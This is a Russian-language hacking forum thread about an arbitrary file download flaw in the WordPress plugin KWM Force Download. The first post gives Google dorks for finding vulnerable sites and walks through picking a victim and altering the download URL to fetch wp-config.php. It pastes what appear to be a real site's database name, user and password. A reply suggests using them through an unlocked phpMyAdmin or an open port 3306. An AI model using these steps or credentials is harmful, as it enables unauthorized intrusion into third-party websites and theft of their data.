Заметка Wordpress - загрузка любого файла

ccvata

Проверенный
Сообщения
47
Симпатии
13
Баллы
8
#1
Дата обнаружения: 07/08/2016
Уязвимость позволяет загрузить любой файл который лежит на сервере
Названия плагина : KWM Force Download
Dork 1 : inurl:force-download.php?file=wp-content/uploads
Dork 2 : inurl:wp-content/uploads inurl:force-download.php?file=

Порядок действий:

1) Заходи в гугл и вставляю любую из дорок выше
2) Выбираем любой сайт (например я взял первый

Пожалуйста, Войдите или Зарегистрируйтесь, что бы увидеть скрытый контент.

)
3)Копируем этот url и изменяем так как нам нужно
4)У меня получается вот так (

Пожалуйста, Войдите или Зарегистрируйтесь, что бы увидеть скрытый контент.

)
5)Готово! Теперь открываем файл wp-config и используем так как нам нужно :)

Notice: эти данные можно использовать для подключения к бд!:) (достаточно только найти хост на котором стоит сайт)

/** The name of the database for WordPress */
define('DB_NAME', 'globalvo_dbforglobal');

/** MySQL database username */
define('DB_USER', 'globalvo_globalv');

/** MySQL database password */
define('DB_PASSWORD', '[email protected]+G^V2$ea');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
 

X-Oleg

Местный
Сообщения
576
Симпатии
586
Баллы
93
#2
Notice: эти данные можно использовать для подключения к бд!:) (достаточно только найти хост на котором стоит сайт
Это если пхпмайадмин незалочен например, также можно подцепится если порт 3306 неблок !

Вообще плагины для вордпресса это вообще кошмар, очень нужно осторожно !